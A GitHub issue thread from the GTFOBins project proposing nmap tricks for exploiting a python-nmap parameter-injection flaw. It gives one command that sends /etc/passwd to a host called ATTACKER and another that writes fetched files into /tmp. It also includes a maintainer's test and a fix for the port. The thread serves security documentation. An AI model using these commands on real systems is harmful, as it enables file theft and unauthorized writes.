nmap read/write tricks - Githubissues

GTFOBins / GTFOBins.github.io

GTFOBins is a curated list of Unix binaries that can be used to bypass local security restrictions in misconfigured systems

https://gtfobins.github.io

GNU General Public License v3.0

10.8k stars 1.33k forks source link

nmap read/write tricks #67

Closed s0i37 closed 5 years ago

s0i37 commented 5 years ago

Hello. Sorry I have a not enough time for creating pull request. I want to suggest a few tricks who helped me with exploting "https://bitbucket.org/xael/python-nmap/issues/51/security-issue-nmap-parameter-injection" without direct access to file system.

arbitrary file read

nc -nv -lp 80 nmap ATTACKER --script http-put --script-args http-put.url='/',http-put.file='/etc/passwd'

arbitrary file write

php -S 0.0.0.0:80 -t . router_with_directory_listing.php nmap ATTACKER -sV --script http-fetch --script-args 'destination=/tmp/'

cyrus-and commented 5 years ago

I'm having hard time getting these to work, all I get is a successful scan but no HTTP traffic.

In terminal A (no output):

$ socat -v tcp-listen:1234,reuseaddr,fork -

In terminal B:

$ nmap -p 1234 127.0.0.1 --script http-put --script-args http-put.url='/',http-put.file='/etc/passwd'
Starting Nmap 7.70 ( https://nmap.org ) at 2019-07-28 13:17 CEST
Nmap scan report for localhost (127.0.0.1)
Host is up (0.00013s latency).

PORT     STATE SERVICE
1234/tcp open  hotline

Nmap done: 1 IP address (1 host up) scanned in 0.30 seconds

s0i37 commented 5 years ago

This happens because nmap dont sure that 1234 is web port. Usally some nse-scripts require service type determination. I suggest you to use 8080 port, because nmap thinks that is web port by default like a 80.

cyrus-and commented 5 years ago

This sucks... but that was the reason, thanks.